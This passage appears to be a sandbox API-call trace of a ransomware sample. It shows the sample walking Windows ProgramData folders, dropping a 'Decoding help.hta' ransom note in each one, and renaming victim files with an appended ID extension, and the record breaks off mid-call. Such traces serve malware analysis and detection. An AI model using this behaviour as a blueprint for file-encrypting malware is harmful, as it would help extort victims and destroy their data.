returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0050.418] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*.*" [0050.418] GlobalMemoryStatus (in: lpBuffer=0x504fd10 | out: lpBuffer=0x504fd10) [0050.418] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10dced58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x430 [0050.418] CloseHandle (hObject=0x430) returned 1 [0050.418] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Coverpages", cAlternateFileName="COMMON~1")) returned 1 [0050.418] lstrcmpW (lpString1=".", lpString2="Common Coverpages") returned -1 [0050.418] lstrcmpW (lpString1="..", lpString2="Common Coverpages") returned -1 [0050.419] lstrcmpiW (lpString1="windows", lpString2="Common Coverpages") returned 1 [0050.419] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.419] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned 53 [0050.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="Common Coverpages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0050.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*" [0050.419] GlobalMemoryStatus (in: lpBuffer=0x504fd10 | out: lpBuffer=0x504fd10) [0050.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11531338, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x430 [0050.420] CloseHandle (hObject=0x430) returned 1 [0050.420] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Inbox", cAlternateFileName="")) returned 1 [0050.420] lstrcmpW (lpString1=".", lpString2="Inbox") returned -1 [0050.420] lstrcmpW (lpString1="..", lpString2="Inbox") returned -1 [0050.420] lstrcmpiW (lpString1="windows", lpString2="Inbox") returned 1 [0050.423] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.423] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned 53 [0050.423] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="Inbox" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" [0050.423] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*.*" [0050.423] GlobalMemoryStatus (in: lpBuffer=0x504fd10 | out: lpBuffer=0x504fd10) [0050.423] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25197a78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x430 [0050.424] CloseHandle (hObject=0x430) returned 1 [0050.424] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Queue", cAlternateFileName="")) returned 1 [0050.424] lstrcmpW (lpString1=".", lpString2="Queue") returned -1 [0050.424] lstrcmpW (lpString1="..", lpString2="Queue") returned -1 [0050.424] lstrcmpiW (lpString1="windows", lpString2="Queue") returned 1 [0050.427] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.427] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned 53 [0050.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="Queue" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" [0050.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*.*" [0050.427] GlobalMemoryStatus (in: lpBuffer=0x504fd10 | out: lpBuffer=0x504fd10) [0050.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x251afae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x430 [0050.428] CloseHandle (hObject=0x430) returned 1 [0050.428] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SentItems", cAlternateFileName="SENTIT~1")) returned 1 [0050.428] lstrcmpW (lpString1=".", lpString2="SentItems") returned -1 [0050.428] lstrcmpW (lpString1="..", lpString2="SentItems") returned -1 [0050.428] lstrcmpiW (lpString1="windows", lpString2="SentItems") returned 1 [0050.430] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.431] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned 53 [0050.431] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="SentItems" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" [0050.431] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*.*" [0050.431] GlobalMemoryStatus (in: lpBuffer=0x504fd10 | out: lpBuffer=0x504fd10) [0050.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x251c7b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x430 [0050.431] CloseHandle (hObject=0x430) returned 1 [0050.431] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 1 [0050.432] lstrcmpW (lpString1=".", lpString2="VirtualInbox") returned -1 [0050.432] lstrcmpW (lpString1="..", lpString2="VirtualInbox") returned -1 [0050.432] lstrcmpiW (lpString1="windows", lpString2="VirtualInbox") returned 1 [0050.434] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.434] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned 53 [0050.434] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="VirtualInbox" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0050.434] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*" [0050.434] GlobalMemoryStatus (in: lpBuffer=0x504fd10 | out: lpBuffer=0x504fd10) [0050.434] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x251dfbb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x430 [0050.435] CloseHandle (hObject=0x430) returned 1 [0050.435] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 0 [0050.435] FindClose (in: hFindFile=0x5d8b50 | out: hFindFile=0x5d8b50) returned 1 Thread: id = 634 os_tid = 0xe2c [0048.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*", lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2c70 [0049.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.877] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.877] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.877] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.877] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0049.877] lstrcmpW (lpString1=".", lpString2="History") returned -1 [0049.877] lstrcmpW (lpString1="..", lpString2="History") returned -1 [0049.877] lstrcmpiW (lpString1="windows", lpString2="History") returned 1 [0050.234] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*" [0050.234] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*") returned 59 [0050.234] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\", lpString2="History" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History" [0050.234] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0050.234] GlobalMemoryStatus (in: lpBuffer=0x18f1fd10 | out: lpBuffer=0x18f1fd10) [0050.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f60fb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x604 [0050.236] CloseHandle (hObject=0x604) returned 1 [0050.236] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0 [0050.236] FindClose (in: hFindFile=0x5e2c70 | out: hFindFile=0x5e2c70) returned 1 Thread: id = 635 os_tid = 0xe30 [0048.909] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*", lpFindFileData=0xc90fd30 | out: lpFindFileData=0xc90fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8490 [0049.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.825] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xc90fd30 | out: lpFindFileData=0xc90fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.825] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.825] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xc90fd30 | out: lpFindFileData=0xc90fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea12c467, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xea12c467, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xea1525c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x0, dwReserved1=0x0, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 1 [0050.119] lstrcpyW (in: lpString1=0x10c8e808, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*" [0050.120] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*") returned 54 [0050.120] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta" [0050.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\decoding help.hta")) returned 0xffffffff [0050.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0051.260] WriteFile (in: hFile=0x37c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xc90fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xc90fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.015] CloseHandle (hObject=0x37c) returned 1 [0055.313] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.148] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WelcomeScan.jpg") returned -1 [0058.148] lstrlenW (lpString="WelcomeScan.jpg") returned 15 [0058.148] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*" [0058.148] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*.*") returned 54 [0058.148] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\", lpString2="WelcomeScan.jpg" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" [0058.148] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" [0058.148] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.149] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xc90fd30 | out: lpFindFileData=0xc90fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea12c467, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xea12c467, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xea1525c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x0, dwReserved1=0x0, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 0 [0058.149] FindClose (in: hFindFile=0x5d8490 | out: hFindFile=0x5d8490) returned 1 Thread: id = 636 os_tid = 0xe34 [0048.918] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*", lpFindFileData=0x1911fd30 | out: lpFindFileData=0x1911fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2f30 [0049.878] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.878] FindNextFileW (in: hFindFile=0x5e2f30, lpFindFileData=0x1911fd30 | out: lpFindFileData=0x1911fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.878] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.878] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.878] FindNextFileW (in: hFindFile=0x5e2f30, lpFindFileData=0x1911fd30 | out: lpFindFileData=0x1911fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76792c22, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x798d48a0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x30ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPLog-07132009-221054.log", cAlternateFileName="MPLOG-~1.LOG")) returned 1 [0050.237] lstrcpyW (in: lpString1=0x11017660, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*" [0050.237] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*") returned 61 [0050.237] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\Decoding help.hta" [0050.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\decoding help.hta")) returned 0xffffffff [0050.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0057.422] WriteFile (in: hFile=0x304, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1911fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1911fcf8*=0x78e, lpOverlapped=0x0) returned 